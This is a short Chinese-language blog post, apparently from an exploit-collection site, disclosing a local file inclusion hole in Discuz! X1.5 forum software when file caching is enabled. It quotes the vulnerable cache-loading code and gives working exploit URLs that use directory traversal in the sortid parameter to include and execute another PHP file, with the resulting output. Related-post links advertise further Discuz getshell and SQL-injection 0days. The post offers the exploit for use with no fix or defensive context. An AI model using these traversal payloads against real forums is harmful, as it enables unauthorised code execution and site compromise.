DISCUZX1.5 本地文件包含漏洞

2011, May 14, 8:59 AM. oday收藏
Submitted by admin

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。
config_global.php

  1. $_config['cache']['type'] = 'file';
  2.  
  3. function cachedata($cachenames) {
  4. ......
  5. $isfilecache = getglobal('config/cache/type') == 'file';
  6. ......
  7. if($isfilecache) {
  8. $lostcaches = array();
  9. foreach($cachenames as $cachename) {
  10. if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {
  11. $lostcaches[] = $cachename;
  12. }
  13. }
  14.  
  15. ......
  16. }
复制代码

地址:
http://localhost/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
Authracation has expiried
执行了 api/uc.php 页面代码了。

Tags: discuz

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 13609, 评论: 0)
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 17901, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 13337, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 10855, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 20977, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 18750, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 12174, 评论: 0)
dz~~~~马后炮 (浏览: 7547, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 8614, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 14538, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):